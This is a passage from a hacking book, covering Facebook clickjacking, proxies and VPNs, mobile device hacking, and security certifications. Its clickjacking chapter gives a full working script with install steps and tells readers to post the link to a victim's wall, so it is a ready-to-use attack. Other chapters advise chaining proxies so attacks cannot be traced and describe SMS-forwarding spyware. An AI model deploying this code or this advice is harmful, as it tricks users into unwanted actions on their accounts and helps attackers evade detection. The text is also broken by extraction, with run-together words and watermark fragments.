
om

Page 95: Hackdecoders- Book by Hitesh Malviya

Chapter 12 Facebook Clickjacking

Objectives:

How it works Mitigation What we’ll see in the future Install it Countermeasures

www.brtr

icks.c

om

Page 96: Hackdecoders- Book by Hitesh Malviya

It allows setting up a website where users will do a facebook like without theirknowledge when clicking any link on the page. This works by dragging an invisible (verylow opacity) facebook like button bellow the mouse when the user hovers a link.

How it works

Since we cannot inject css or javascript inside the facebook iframe, we cannot change thecursor:pointer css property when the mouse is over the like button, so it would besuspicious to have a page always with a clicking-hand mouse cursor. The workaroundwas making the like button follow the mouse when it’s normal to have a clicking-handmouse cursor (cursor:pointer) such as when hovering a link!

After clicking a link, the user will like the current page in facebook and will in fact beredirected to the href (through javascript magic – document.location.href) and a cookiewill be defined so that the facebook like button no longer appears in future page loads.

Mitigation

The purpose of this script is creating a discussion about how to prevent clickjacking andby using this script for any reason other than security debugging you might be violatingFacebook Terms and Service Statements and might lose your Facebook account.

As such, the code you have below it’s easily found on the web if you use it in yourwebsite and I’ll personally report you if you use it for malicious reasons.

www.brtr

icks.c

om

Page 97: Hackdecoders- Book by Hitesh Malviya

What we’ll see in the future

Before discussing how clickjacking will evolve, there is an important assumption to keepin mind: it’s possible to share a website not directly connected to where the like button isplaced, meaning I might place a like button in fernandomagro.com liking anotherwebsite/domain.

So, it’s possible to create a database of websites and generate a lot of different likebuttons consecutively in the same website.

Wrapping it all up, when Facebook Clickjacking goes viral, I believe we will start seeingconsecutive clickjacking likes/shares from malicious websites with huge galleries wherea lot of clicking takes place. Example: having a gallery with 500 interesting pictures,imagine clicking those galleries for 2 hours and then returning to facebook and realizingthe account was flooded with a huge amount of unrequested likes.

Install it

I managed to wrap it all up around a nice javascript file that you just need to include tomake it work in your webpage.

Change the headers of your webpage with the following:

<script src="http://code.jquery.com/jquery-1.5.js"></script><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script><script>window.DO_CLICKJACKING = 1</script><script src="clickjacking.js"></script>

Then, download the file from http://malviya.my3gb.com/clickjacking.js and put it in anaccessible folder:

Code:

var $J = jQuery.noConflict();

// solve: images and floating divsfunction heightestChild(elem){

var t=0;var t_elem;$J("*",elem).each(function () {

if ( $J(this).outerHeight(true) > t ) {

www.brtr

icks.c

om

Page 98: Hackdecoders- Book by Hitesh Malviya

t_elem=$J(this);t=t_elem.outerHeight(true);

}});// we care about the heighestif (elem.outerHeight(true) > t){

t = elem.outerHeight(true);}

//return elem.outerHeight(true);return t+3; // hotfix

}

function highestOffsetTop(elem){

var t=elem.offset().top;var t_elem;$J("*",elem).each(function () {

if ( $J(this).offset().top < t ) {t_elem=$J(this);t=t_elem.offset().top;

}});// we only care about the object that is most on topif (elem.offset().top < t){

t = elem.offset().top;}

//return elem.offset().top;return t+3;

}

// 57 19 63

$J(document).ready(function(){if (window.DO_CLICKJACKING) { // wrap up EVERYTHING

/*$J("body").append('<div id="clickjacking"style="position:absolute;display:block;opacity:0.01;-khtml-opacity:.01;-moz-opacity:.01;filter:alpha(opacity=1);"><fb:like layout="button_count" show_faces="false"width="100"></fb:like></div>');*/

$J("body").append('<div id="clickjacking"style="position:absolute;display:block;"><fb:like layout="button_count" show_faces="false"width="100"></fb:like></div>');

var elementWidth = 0;var elementHeight = 0;var theElement = '';var likeDone = 0;

www.brtr

icks.c

om

Page 99: Hackdecoders- Book by Hitesh Malviya

if ($J.cookie("clickjacking_"+escape(document.URL)) == 1){

likeDone = 1;}

// fired when the user clicks a link (likes our page) -> clickjacking is doneFB.Event.subscribe('edge.create', function(response) {

$J("#clickjacking").css("display", "none");likeDone = 1;$J.cookie("clickjacking_"+escape(document.URL), "1");// let the user actually go to the link he clicked.window.location.href = theElement.attr('href');

});

$J(document).mousemove(function(event) {if (theElement != ''){

if (event.pageY < (highestOffsetTop(theElement)-4) ||event.pageY > (highestOffsetTop(theElement) + heightestChild(theElement)) || event.pageX <theElement.offset().left || event.pageX > (theElement.offset().left + theElement.width()) )

{//alert(event.pageY + " " + theElement.height() + " " +

theElement.offset().top);/* $J("#log").append("<p>mouse off the element LEFT "

+ event.pageX + " " + theElement.offset().left + " " + (theElement.offset().left +theElement.width()) + "</p>");

$J("#log").append("<p>mouse off the element TOP " +event.pageY + " " + highestOffsetTop(theElement) + " " + (highestOffsetTop(theElement) +heightestChild(theElement,true)) + "</p>");*/

theElement = ''; // the mouse is off theElement$J("#clickjacking").css("display", "none");

}else{

if ($J.browser.msie) {$J("#clickjacking").css("top",(event.pageY-

15)+"px");$J("#clickjacking").css("left",(event.pageX-

20)+"px");}else{

$J("#clickjacking").css("top",(event.pageY-5)+"px");

$J("#clickjacking").css("left",(event.pageX-20)+"px");

}}

}});

www.brtr

icks.c

om

Page 100: Hackdecoders- Book by Hitesh Malviya

$J(document).delegate("a","mouseenter", function (){// register mouse is inside elementif (likeDone == 0){

theElement = $J(this);$J("#clickjacking").css("display", "block");

}});

} // window.DO_CLICKJACKING});

/*** Cookie plugin** Copyright (c) 2006 Klaus Hartl (stilbuero.de)* Dual licensed under the MIT and GPL licenses:* http://www.opensource.org/licenses/mit-license.php* http://www.gnu.org/licenses/gpl.html**/

/*** Create a cookie with the given name and value and other optional parameters.** @example $.cookie('the_cookie', 'the_value');* @desc Set the value of a cookie.* @example $.cookie('the_cookie', 'the_value', { expires: 7, path: '/', domain: 'jquery.com',

secure: true });* @desc Create a cookie with all available options.* @example $.cookie('the_cookie', 'the_value');* @desc Create a session cookie.* @example $.cookie('the_cookie', null);* @desc Delete a cookie by passing null as value. Keep in mind that you have to use the same

path and domain* used when the cookie was set.** @param String name The name of the cookie.* @param String value The value of the cookie.* @param Object options An object literal containing key/value pairs to provide optional cookie

attributes.* @option Number|Date expires Either an integer specifying the expiration date from now on in

days or a Date object.* If a negative value is specified (e.g. a date in the past), the cookie will be

deleted.* If set to null or omitted, the cookie will be a session cookie and will not be

retained* when the the browser exits.* @option String path The value of the path atribute of the cookie (default: path of page that

created the cookie).

www.brtr

icks.c

om

Page 101: Hackdecoders- Book by Hitesh Malviya

* @option String domain The value of the domain attribute of the cookie (default: domain ofpage that created the cookie).* @option Boolean secure If true, the secure attribute of the cookie will be set and the cookie

transmission will* require a secure protocol (like HTTPS).* @type undefined** @name $.cookie* @cat Plugins/Cookie* @author Klaus Hartl/[email protected]*/

/*** Get the value of a cookie with the given name.** @example $.cookie('the_cookie');* @desc Get the value of a cookie.** @param String name The name of the cookie.* @return The value of the cookie.* @type String** @name $.cookie* @cat Plugins/Cookie* @author Klaus Hartl/[email protected]*/

jQuery.cookie = function(name, value, options) {if (typeof value != 'undefined') { // name and value given, set cookie

options = options || {};if (value === null) {

value = '';options.expires = -1;

}var expires = '';if (options.expires && (typeof options.expires == 'number' || options.expires.toUTCString))

{var date;if (typeof options.expires == 'number') {

date = new Date();date.setTime(date.getTime() + (options.expires * 24 * 60 * 60 * 1000));

} else {date = options.expires;

}expires = '; expires=' + date.toUTCString(); // use expires attribute, max-age is not

supported by IE}// CAUTION: Needed to parenthesize options.path and options.domain// in the following expressions, otherwise they evaluate to undefined// in the packed version for some reason...var path = options.path ? '; path=' + (options.path) : '';var domain = options.domain ? '; domain=' + (options.domain) : '';

www.brtr

icks.c

om

Page 102: Hackdecoders- Book by Hitesh Malviya

var secure = options.secure ? '; secure' : '';document.cookie = [name, '=', encodeURIComponent(value), expires, path, domain,

secure].join('');} else { // only name given, get cookie

var cookieValue = null;if (document.cookie && document.cookie != '') {

var cookies = document.cookie.split(';');for (var i = 0; i < cookies.length; i++) {

var cookie = jQuery.trim(cookies[i]);// Does this cookie string begin with the name we want?if (cookie.substring(0, name.length + 1) == (name + '=')) {

cookieValue = decodeURIComponent(cookie.substring(name.length + 1));break;

}}

}return cookieValue;

}};

Now post webpage link to the victim’s wall,When victim will click on like button,he willbe redirected to your webpage.

Countermeasures

(1)Don’t click on shorten url (bit.ly, goo.gl etc.)(2)Don’t click on naked or violate image & video link.(3)Don’t click on any application which has different domain then facebook.

www.brtr

icks.c

om

Page 103: Hackdecoders- Book by Hitesh Malviya

Chapter 13 Proxy & VPN technology

Objectives:

Proxy technology Introduction Working of proxy server Types of proxy server Socks proxy Free proxy servers Use proxies for attack Tools VPN Introduction Working of VPN Types of VPN Free VPN services VPN Tools

www.brtr

icks.c

om

Page 104: Hackdecoders- Book by Hitesh Malviya

Proxy Technology

Introduction

Proxy server is a server, acts as intermediate between internal and external host. Proxyserver hides the computer from outside network.

Working of Proxy Server

When Internal server requests to process a website then it enters to proxy server ,proxyserver adds the header from the ip packet and change reconstructs the data packet withdifferent ip address and send it to external host.

Types of Proxy Server

Caching Proxy Server: Caching is the servicing the requests of clients with thehelp of saved contents from previous requests, without contacting specifiedserver.

Web Proxy Server: Proxy targeted to World Wide Web is called web proxyserver.

Anonymizing Proxy Server: It tried to annonimize the web surfing. Transparent Proxy Server: It doesn’t modify the request and response which is

required for proxy authentication and identification, It works on port 80.

www.brtr

icks.c

om

Page 105: Hackdecoders- Book by Hitesh Malviya

Non Transparent Proxy Server: It is a proxy that modifies the request andresponse in order to add some services to user agent.

Socks Proxy

Socks is an IETF Stranded. It is proxy system which supports proxy aware applications.Its package includes three components.(1)Socks server for the operating system.(2)A Client program like ftp,telnet etc.(3)A Client library for socks.

The Socks proxy doesn’t allow the external components to collect the information of theclient which had generated a request,

Free Proxy Servers

Attacking from thousand of proxy servers would be difficult to trace, There are thousandof proxy servers are available on the internet. Some websites which provides free proxyservers are below:http://www.proxy4free.com/http://spys.ru/en/http://tools.rosinstrument.com/proxy/?rule1

Use of Proxies for attack

An attacker uses chain of proxies for attack, IDS or Firewall system install at the victimserver will always log last proxy ip address that why traceback is difficult.

Tools

Allegrosurf

It is web accelerating, content filtering, proxy server. It allows user to share a singleinternet connection with the rest of the network while protecting users from unwantedcontent and increasing overall speed.

www.brtr

icks.c

om

Page 106: Hackdecoders- Book by Hitesh Malviya

Download Link: http://www.downloadsofts.com/download/Servers/Firewall-Proxy-Servers/AllegroSurf-download-details.html

Proxy Manager

It connects to the internet and download lists of proxy servers from various websites, Youwill have thousand of proxy server IP addresses within a minute.

Download Link: http://www.brothersoft.com/proxy-manager-35000.html

www.brtr

icks.c

om

Page 107: Hackdecoders- Book by Hitesh Malviya

Tor Proxy Chaining Software

Tor is network of virtual tunnels connected together and works like a big chained proxy.It masks identity of originated computer from the internet. It is the best proxy tool evermade.

Download Link: https://www.torproject.org/download/download.html.en

JAP Proxy

JAP enables anonymous web surfing with any browser through the use of integratedproxy services that hide your real IP address.www.b

rtrick

s.com

Page 108: Hackdecoders- Book by Hitesh Malviya

Download Link: http://en.kioskea.net/download/download-3480-jap

VPN(Virtual Private Network)

Introduction

A virtual private network (VPN) is a network that uses primarily publictelecommunication infrastructure, such as the Internet, to provide remote offices ortraveling users access to a central organizational network.

VPNs typically require remote users of the network to be authenticated, and often securedata with encryption technologies to prevent disclosure of private information tounauthorized parties.

Working of VPN

When internal server requests to transfer data to external host over the internet, VPNcreates encrypted tunnel between internal server and external host while transferring dataover the internet.

www.brtr

icks.c

om

Page 109: Hackdecoders- Book by Hitesh Malviya

Types of VPN

PPTP VPN(Dial-up VPN)

A simple method for VPN is PPTP. It is a software based VPN system that uses yourexisting Internet connection. By using your existing Internet connection, a secure"tunnel" is created between two points allowing a remote user to connect to a remotenetwork.

Site-to-site VPN

Site-to-site is the same much the same thing as point-to-point except there is no"dedicated" line in use. Each site has its own internet connection which may not be fromthe same ISP or even the same type. One may have a T1 while the other only has DSL.Unlike point-to-point, the routers at both ends do all the work. They do all the routing andencryption.

Point-to-Point VPN

A traditional VPN can also come as a point-to-point. These are also referred to as"leased-line VPNs." Simply put, two or more networks are connected using a dedicatedline from an ISP. These lines can be packet or circuit switched. For example, T1's, MetroEthernet, DS3, ATM or something else.

MPLS VPN

MPLS is a true "ISP-tuned" VPN. It requires 2 or more sites connected via the same ISPor an "on-net" connection*. There is a way to configure this using different ISP's or "off-net" but you never get the same performance. I've tried... While it does use your existingInternet connection, tweaks are made by your ISP for performance and security.

Free VPN Services

VPN protects user privacy over the internet.There are few services available on internetwhich provides free vpn services.

www.brtr

icks.c

om

Page 110: Hackdecoders- Book by Hitesh Malviya

ProXPN

A free VPN service designed for use with Windows and Mac computers. ProXPN worksby downloading a small free application from which to connect. The service is alsocompatible with the iPhone and other mobile phones that support VPN.

Web:www.proxpn.com

GPass

www.brtr

icks.c

om

Page 111: Hackdecoders- Book by Hitesh Malviya

The GPass service provides free VPN access as well as an impressive fast web proxy touse directly in your browser. The service is very popular in China where internetcensorship is commonplace.

Web: http://gpass1.com/gpass/

CyberGhost

Offering 1GB of encypted traffic per month on the free package, CyberGhost is anotherWindows-only VPN client. In order to use the service you are required to register for afree account which unfortunately does not allow you to pick and choose your servers.

Web: http://cyberghostvpn.com/en/surf-anonym.html

SecurityKisswww.b

rtrick

s.com

Page 112: Hackdecoders- Book by Hitesh Malviya

The free package provided by SecurityKiss brings you 300MB of data transfer per day,but provides an uncapped line with plenty of speed. You’ll need the SecurityKisssoftware to access the service, and this is only compatible with Windows.

Web: http://www.securitykiss.com/

VPN Tools

VPN software brings the security of a private network to an insecure network, and allowsyou to access private local networks from anywhere. There are some vpn tools availablewhich can we use to protect our privacy.

OpenVPN

OpenVPN is an open source VPN server that's easy to set up for use with open sourceVPN clients. You can easily export configuration files from OpenVPN to import into avariety of open source and commercial clients.

Download Link: http://www.openvpn.net/

www.brtr

icks.c

om

Page 113: Hackdecoders- Book by Hitesh Malviya

LogMeIn Hamachi

Hamachi's strongest attribute is its ease of use. If you've read some of the other entries inthe Hive Five and realized that you don't want a contract for a corporate VPN or thehassle of configuring a bunch of routers with open-source firmware packages, and youjust want to set up a simple virtual network between you and your friend, your phone, oryour office, Hamachi offers nearly instant deployment.

Download Link: http://www.logmeinhamachi.com/

Windows Built-In VPN

Windows has a built-in VPN client. Before exploring other client solutions, it's worthpulling up the quick launch box in the Windows start menu and typing "VPN" to start theconfiguration process. In Windows versions prior to Windows Vista, the built-in VPNclient received a fair amount of criticism for lacking features and supported protocols.

www.brtr

icks.c

om

Page 114: Hackdecoders- Book by Hitesh Malviya

Chapter 14 Hacking Handheld devices

Objectives:

Different OS in Mobile Phones What can a hacker do with your mobile phone Vulnerabilities in different mobile phones Spywares Blackberry Handheld devices Iphone & Ipod Jailbreaking Iphone hacking using ifuntastic Trojans & viruses Mobile antivirus Mobile phone security tips

www.brtr

icks.c

om

Page 115: Hackdecoders- Book by Hitesh Malviya

Different OS in Mobile Phone

Windows mobile Symbian OS Blackberry OS Apple iOS

What Can a Hacker DO with your mobile phone

Steal your information Rob your money Spying Acessing your voice mails,messages etc. Insert the virus

Vulnerabilities in different Mobile Phones

A format string vulnerability has been found in RIM’s Blackberry 7270, It allowsremote hacker to disable phone’s calling feature.

HTC Hytn using AGEPhone is vulnerable to malformed SIP messages sent overwireless LAN connections, It allows remote hacker to disconnect active calls.

A Bufferoverflow vulnerability in Samsung SCH-i730 that runs SJPhone SIPclients,It allows an attacker to disable the phone and slow down the operatingsystem.

Spyware:SymbOS/Htool-SMSSender.A.intd

It is a prototype malware application that targets symbian OS. It sends copies of receivedSMS messages to the spyware author. Spyware:SymbOS/Htool-SMSSender.A.intd isdistributed as “XaSMS.SIS”. Both the source code and SIS file are included in a RARarchive file named “HackSMS.rar”. It copies the text of last SMS messagereceived,places it into a new SMS, and forwards the message to the spyware.

Spyware:SymbOS/MultiDropper.CG

It is the spyware application that targets the symbian operating system for mobile phones.The spyware application comes with a variant of the MultiDropper mobile phone Trojan.

www.brtr

icks.c

om

Page 116: Hackdecoders- Book by Hitesh Malviya

It tracks messages copies log files with the phone number of incoming and outgoingphone calls.

Blackberry Handheld device

“Blackberry attack toolkit” along with “BBproxy” software exploits the vulnerability ofany company’s website. BBproxy is security assessment software allows proxyconnection between internet and internal network. “Attack vector” tricks or links user todownload malicious software.

Blackjacking

www.brtr

icks.c

om

Page 117: Hackdecoders- Book by Hitesh Malviya

BBproxy tool is used for Blackjacking attack.An attacker need to install this tool on hisblackberry device then he should have to send it in email attachments to the targets. Thechannel between Blackberry server and handheld device is encrypted and can’t beproperly inspected by security products.

Blackberry Wireless Security

The blackberry enterprise solution uses AES and triple-DES encryption method toencrypt data in transit. The blackberry enterprise solution is designed so that data remainsencrypted during transit between handheld device and blackberry server.

Countermeasures

Clean Blackberry device memory. Protect storage messages on the messaging server. Encrypt application password and storage on the blackberry device. Use AES technology to secure the storage of password keeper.

IPhone & IPod Jailbreaking

www.brtr

icks.c

om

Page 118: Hackdecoders- Book by Hitesh Malviya

Jailbreaking is the process of unlocking of ipod and iphone to allows the installation thirdparty applications.It opens up your iPhone’s filesystem so that it can be accessed fromyour computer.

Tools for Jailbreaking

There are few tools available for iphone jailbreaking.

iDemocracy

iDemocracy is iPhone jailbreak and third party app for windows platform. It installsinstaller.app(for third party app,games ) & simunlock.

Download Link: http://code.google.com/p/idemocracy/downloads/list

www.brtr

icks.c

om

Page 119: Hackdecoders- Book by Hitesh Malviya

iActivator

It works on Mac operatin system providing GUI tools for iPhone jailbreaking,activation/deactivation.

Download Link: http://www.filestube.com/c191b10600f1cfcd03ea,g/iActivator-v1-1-4.html

iFuntastic

www.brtr

icks.c

om

Page 120: Hackdecoders- Book by Hitesh Malviya

iFuntastic is iPhone modification & hacking tool. It has full file browser feature,whichsimply browses the iphone’s internal file system, and edit UI images.

Download Link: http://ifuntastic.soft32.com/free-download

iPhone Hacking using iFuntastic

Prerequisite

An Intel Mac The iPhone Hacking Kit Your Mac and iPhone need to be connected to the same wi-fi network.

Steps to perform iPhone Hacking

Install iFuntastic to your applications folder. After installing, Reboot your Mac safely. Make sure your iPhone is on, Then plug it into your Mac using usb cable. After iTunes Launches, quit it Launch iFuntastic Press prepare button, present on left side of iFuntastic window. Click the jailbreak button at the bottom of the window. On the next page of the window, there are six steps, follow them. You will see the window as on next slide.

Tool to unlock iPhone: anySIM

anySIM is a GUI-Based unlocking system for iPhone. This is for iPhones workingrecently with OSv1.1.1 running on it or iPhones that were upgraded from 1.0.2 to 1.1.1

www.brtr

icks.c

om

Page 121: Hackdecoders- Book by Hitesh Malviya

Steps for Unlocking your iPhone using AnySIM

Jailbreak your iPhone with software. Set up to install third party applications. Now download AnySIM and expand the ZIP file. Drag the resulting file “anySIM” (full name, anySIM.app) to your /Applications

Folder. Open terminal (Located in /Applications/Utilities) and type the following :

Scp –r /Applications/anySIM.app root@IPADDRESS: /Applications/

-replace the ipaddress with the ipaddress of your iPhone . Restart your iPhone Run the anySIM application to unlock your phone.

Trojans and Viruses

Cabir: Infects mobile phones running on Symbian OS. When a phone is infected,the message 'Caribe' is displayed on the phone's display and is displayed everytime the phone is turned on. The worm then attempts to spread to other phones inthe area using wireless Bluetooth signals.

www.brtr

icks.c

om

Page 122: Hackdecoders- Book by Hitesh Malviya

Duts: A parasitic file infector virus and is the first known virus for the PocketPCplatform. It attempts to infect all EXE files in the current directory (infects filesthat are bigger than 4096 bytes).

Skulls: A trojan horse piece of code. Once downloaded, the virus, called Skulls,replaces all phone desktop icons with images of a skull. It also will render allphone applications, including SMSes and MMSes useless.

Commwarrior: First worm to use MMS messages in order to spread to otherdevices. Can spread through Bluetooth as well. It infects devices running underOS Symbian Series 60. The executable worm file, once launched, hunts foraccessible Bluetooth devices and sends the infected files under a random name tovarious devices.

Antivirus

Kaspersky Antivirus

www.brtr

icks.c

om

Page 123: Hackdecoders- Book by Hitesh Malviya

Kaspersky Anti-virus Mobile protects smartphones from malicious programs that targetsmobile platforms.

Download Link: http://www.kaspersky.com/kaspersky_mobile_security

BitDefender Mobile security

BitDefender Mobile security provides antivirus protection for mobile devices runningSymbian or Microsoft windows Mobile.

Download Link: http://www.bitdefender.com/solutions/mobile-security-android.html

BullGuard Mobile Antiviruswww.brtr

icks.c

om

Page 124: Hackdecoders- Book by Hitesh Malviya

BullGuard protects Pocket PCs and smartphones from malicious programs that targetsmobile platforms. It offers both On-Demand and On-Access Scanning.

Download Link: http://www.bullguard.com/products/bullguard-mobile-security-10.aspx

Mobile Phone Security Tips

Keep your mobile antivirus updated. When entering a crowed zone, make sure to switch off Bluetooth. Do not open untrustworthy applications. Do not pair with unknown devices. Register 15 digits IMEI number for your GSM Handset. Protect your device by setting up a Personal identification number(PIN).

www.brtr

icks.c

om

Page 125: Hackdecoders- Book by Hitesh Malviya

Chapter 15 Career certification in IT

Security

Objectives:

CompTIA Cisco systems EC Council GIAC ISACA Offensive security (ISC)2

www.brtr

icks.c

om

Page 126: Hackdecoders- Book by Hitesh Malviya

IT security certifications rose 3.1% in value over the past two years and 1.2% in value inthe last six months. Certain types of security skills are seeing dramatic growth. A 27%rise in value was measured for the Certified Information Security Manager designation,just in the past six months.

Brodkin reported on a survey carried out for the International Information SystemsSecurity Certification Consortium, (ISC)^2, which showed "that holders of the CISSP,SSCP or CAP certifications who work in the Americas and have at least five yearsexperience earn [an average of] $102,376 per year – more than $21,000 higher than ITpros who also have five years experience but lack the certifications."

There are some vendors working is the field of information security which providesCareer certification to candidates.

CompTIA

CompTIA is a provider of professional certifications for the information technology (IT)industry. CompTIA chairs and manages the Initiative for Software Choice.

Certifications provided in information security are:

Security+ CSPA

Visit http://www.comptia.org/ for more details.

Cisco Systems

www.brtr

icks.c

om

Page 127: Hackdecoders- Book by Hitesh Malviya

Cisco Systems also sponsors a line of IT Professional certifications for Cisco products.There are five levels of certification: Entry, Associate, Professional, Expert, and recentlyArchitect, as well as eight different paths, Routing & Switching, Design, NetworkSecurity, Service Provider, the newly introduced Service Provider Operations, StorageNetworking, Voice, and Wireless.

Certifications in Information security:

CCNA Security CCSP CCIE Security

EC-Council

The EC-Council is best known for its professional certifications for the IT security field.It offers numerous certifications in a variety of fields related to IT security, includingdisaster recovery, secure programming, e-Business and general IT security knowledge.

These are some famous certifications products of EC-Council.

C!EH CH!FI E!CSA LPT ENSA

www.brtr

icks.c

om

Page 128: Hackdecoders- Book by Hitesh Malviya

GIAC

(GIAC) is an information security certification entity that specialises in technical andpractical certification as well as new research in the form of its GIAC Gold program.

GSIF GSEC GCIA

ISACA

ISACA is an international professional association that deals with IT Governance. It is anaffiliate member of IFAC Previously known as the Information Systems Audit andControl Association, ISACA now goes by its acronym only, to reflect the broad range ofIT governance professionals it serves.

CISA CISM

www.brtr

icks.c

om

Page 129: Hackdecoders- Book by Hitesh Malviya

Offensive Security

Offensive security is leading information Security Company which offers High skilledtraining on Information security products It is the only one of vendor who offer real timelive training on information technology. It offers following certification courses

OSCP ( Offensive security certified professional) OSEE ( Offensive security exploitation expert) OSWE ( Offensive security web expert) OSCE ( Offensive security certified expert) OSWP ( Offensive security certified wireless professional)

(ISC)²

The International Information Systems Security Certification Consortium ((ISC)2) isa non-profit organization headquartered in Palm Harbor, Florida. The most widely knowncertification offered by the organization is a Certified Information Systems SecurityProfessional (CISSP) certification. [1] [2]

The organization maintains what it calls a Common Body of Knowledge for informationsecurity for the following certifications:

CISSP

ISAAP

SSAP

SSCP

www.brtr

icks.c

om

Page 130: Hackdecoders- Book by Hitesh Malviya

List of top 10 Highest Paying IT Certifications

According to recent salary surveys by ZDNET's Tech Republic organization, thefollowing are the highest paying certifications to have in the technology industry.

Following each certification is the average annual salary being paid to individualresponders that hold the certification. I have also listed training resources to learn moreinformation about how to acquire each of the highest paying certifications.

1. PMI Project Management Professional (PMP)With an average annual salary of $101,695, the PMP certification from the ProjectManagement Institute (PMI) organization tops the list of highest paying certifications forthe current year.

2. PMI Certified Associate in Project Management (CAPM)Next highest on the list of highest paying certifications is PMI's Certified Associate inProject Management (CAPM). The average annual salary for CAPM holders that weresurveyed is $101,103.

3. ITIL v2 - FoundationsWith an annual average salary of $95,415 the ITIL v2 Foundations certification came upthird on the list of highest paying certifications. ITIL stands for the IT InfrastructureLibrary. The ITIL certification is designed to show expertise in ITIL service support andservice delivery.

4. Certified Information Systems Security Professional (CISSP)Coming in at a close 4th on the list of highest paying certifications is the CertifiedInformation Systems Security Professional or CISSP certification from (ISC)2. Theaverage annual reported salary was $94,018.

5. Cisco CCIE Routing and SwitchingAt $93,500 per year average annual salary, the Cisco CCIE Routing and Switchingcertification came in 5th on the list of highest paying certifications in the technologyindustry.

6. Cisco CCVP - Certified Voice ProfessionalNumber six on the list of the highest paying certifications is the Cisco CCVP or CiscoCertified Voice Professional. The average annual salary of CCVP respondents was$88,824.

7. ITIL v3 - ITIL MasterThe ITIL v3 certification - the ITIL Master - came in 7th on the list of the highest payingtechnical certifications. The average annual salary for ITIL Master Certification holderswas $86,600.

www.brtr

icks.c

om

Page 131: Hackdecoders- Book by Hitesh Malviya

8. MCSD - Microsoft Certified Solution DeveloperThe MCSD or Microsoft Certified Solution Developer certification pays an average of$84,522. This puts the MCSD certification at number 8 on the list of highest payingcertifications in technology.

9. Cisco CCNP - Cisco Certified Network ProfessionalCisco Certified Network professional or CCNP certification is number 9 on the list ofhighest paying technical certifications. The average annual salary reported by CCNPholders is $84,161.

10. Red Hat Certified EngineerThe Red Hat Certified Engineer (RGCE) came in at number 10 on the list of highestpaying certifications. The average annual salary reported by Red Hat Certified Engineersis $83,692.

www.brtr

icks.c

om

Page 132: Hackdecoders- Book by Hitesh Malviya

www.brtr

icks.c

om